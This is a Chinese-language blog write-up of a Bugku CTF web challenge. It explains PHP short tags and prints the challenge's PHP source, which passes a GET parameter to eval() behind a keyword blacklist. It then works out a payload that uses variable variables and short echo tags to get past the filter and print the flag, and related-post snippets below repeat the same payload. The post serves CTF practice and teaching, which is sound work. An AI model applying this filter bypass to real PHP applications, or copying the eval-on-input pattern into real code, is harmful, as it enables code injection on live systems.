bugku ctf 闪电十六鞭 <?= ?> 短标签

已于 2022-03-08 14:56:18 修改
阅读量397 收藏 1
点赞数
分类专栏: ctf 文章标签: python 开发语言 后端
于 2022-03-08 14:39:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/123352702
版权

0x00 解题须知

在php中

<? ?>和<?= ?>是短标签

而<?php ?>是长标签
其中<?= 是代替 <? echo的

<? ?>代替的是<?php ?>

php.ini文件 可以配置php 是否可以解析短标签

short_open_tag = On

示例如下:

0x01 解题

<?php
    error_reporting(0);
    require __DIR__.'/flag.php';

    $exam = 'return\''.sha1(time()).'\';';

    if (!isset($_GET['flag'])) {
        echo '<a href="./?flag='.$exam.'">Click here</a>';
    }
    else if (strlen($_GET['flag']) != strlen($exam)) {
        echo '长度不允许';
    }
    else if (preg_match('/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is', $_GET['flag'])) {
        echo '关键字不允许';
    }
    else if (eval($_GET['flag']) === sha1($flag)) {
        echo $flag;
    }
    else {
        echo '马老师发生甚么事了';
    }

    echo '<hr>';

    highlight_file(__FILE__);

由代码可知 如果想要输出 $flag

必须

1.get传参 flag
2.flag值的长度得和$exam的长度一样 测试后者长度为49
3.不允许 存在 '  "  .   \\\\   (       )     [    ]  _  flag  echo  print require include  die  exit   is  等字符
4.eval($_GET['flag']) 结果要等于 sha1($flag)

可以从 eval() 代码执行函数这里做文章
想办法 让 该函数 直接执行 输出 $flag

$a= 'fla1'; //因为 flag 不可以直接出现 可以用 赋值某一位的值替换
$a{3}='g';
?>  //再用闭合前面的 <?php
<?=$$a;?> //短标签输出$flag
不足49的长度 差多少 用1补齐 或者刚好三个<?=$$a;?> 输出flag刚好49

payload 为

$a='fla1';$a{3}='g';?><?=$$a;?><?=$$a;?><?=$$a;?>

在这里插入图片描述

可以本地测试 短标签

<?php


$flag = 123  ;

eval('$a="fla1"; $a{3}="g";  ?> 111111111 <?=$$a;?> <?php echo $$a ?>' );

?>

在这里插入图片描述

LuckyCharm~
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
闪电十六
qq_48511129的博客
01-27 763
这题主要考察分析php代码能力,分析代码构造url,进行过滤 http://114.67.246.176:18660/?flag=a=′fla∗′;a='fla*';a=′fla∗′;a{3}=‘g’;?>11111111111111111;<?=$$a;?>得到flag
Bugku CTF 每日一题 闪电十六
彼岸花苏陌的博客
01-16 1026
闪电十六开发现出现源码 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } else if (strlen
[bugku]-闪电十六
weixin_52116519的博客
03-30 636
==============================简化源码============================== 1、strlen($_GET['flag']) != strlen($exam) flag变量长度为49 2、flag过滤了 '/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is' 3、(eval($_GET['flag']) === sha1($flag)) 原理 eva.
BugKu_闪电十六
Kobalos的博客
08-17 1013
访问目标地址 发现了一段php代码,又是代码审计的问题 分析代码 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } .
bugku-闪电十六
小诺言的博客
04-05 1453
闪电十六
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
Bugku 闪电十六
m0_63253040的博客
03-11 897
进入环境,是一串php代码 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } else if (strlen
BugKu——闪电十六
qq_52051736的博客
03-08 545
打开题目链接 是一段php代码,应该是代码审计问题,首先分析源码 目标是输出flag变量,所以flag就在flag变量里面 输出条件有三个 flag变量长度等于$exam的长度,长度为49 flag变量不能包含` , “ , . , \ , ( , ) , [ , ] , _ , flag , echo , print , require , include , die , exit ; eval($_GET[‘flag’]) === sha1($flag) 前面两个条件好绕过,就是第三
二十八、bugku 闪电十六
山兔的博客
09-05 536
php字符对照 &quot=" <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } else if (strl
[红明谷CTF 2021]write_shell 反引号与标签
qq_54929891的博客
04-10 1704
<?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ return $input; .
php中的标签 太坑人了
weixin_33811539的博客
09-26 128
今天配置了一个php页面去修改svn密码问题,结果调了半天,最后在Windows和 Linux的运行现象是不一样,运行结果更不一样了,关键是完全一模一样的代码。 最后发现是标签引起的,Windows环境中标签默认是打开的,Linux下 默认是关闭的。 控制参数: short_open_tag = On 如果设置为Off,则不能正常解析类似于这样形式的php文件: phpinfo...
【 书生·浦语大模型实战营】作业(六):Lagent & AgentLego 智能体应用搭建
最新发布
专注大数据与人工智能技术分享,欢迎私信加群互相学习!
05-03 1128
本篇笔记内容主要为 【书生·浦语大模型实战营】作业(六):Lagent & AgentLego 智能体应用搭建智能体的作业 ,主要对智能体应用理论部分及具体搭建流程详细介绍,并分别进行实战应用及可视化展示,欢迎大家交流学习!
SpringBoot中实现发送邮件
hac1322的博客
04-30 760
当你添加了spring-boot-starter-mail依赖后,Spring Boot会自动配置JavaMailSender实例,并根据application.yml文件中的属性来配置这个实例。你可以直接在需要发送邮件的地方通过@Autowired注解将JavaMailSender实例注入到你的类中,然后使用它来发送邮件。:首先,需要在你的pom.xml文件中添加Spring Boot的邮件发送器依赖。,简化了在Spring Boot应用程序中发送电子邮件的设置过程。Spring Boot的。
python复习(三)
qq_43710593的博客
04-29 502
类是一种面向。
链表刷题集
yajunjiao的专栏
04-30 931
本文主要列举了一些刷的题,不多,有那么几道,也建议各位去建立自己的刷题集。积少成多。
BugkuCTF 字符?正则?
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战题目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值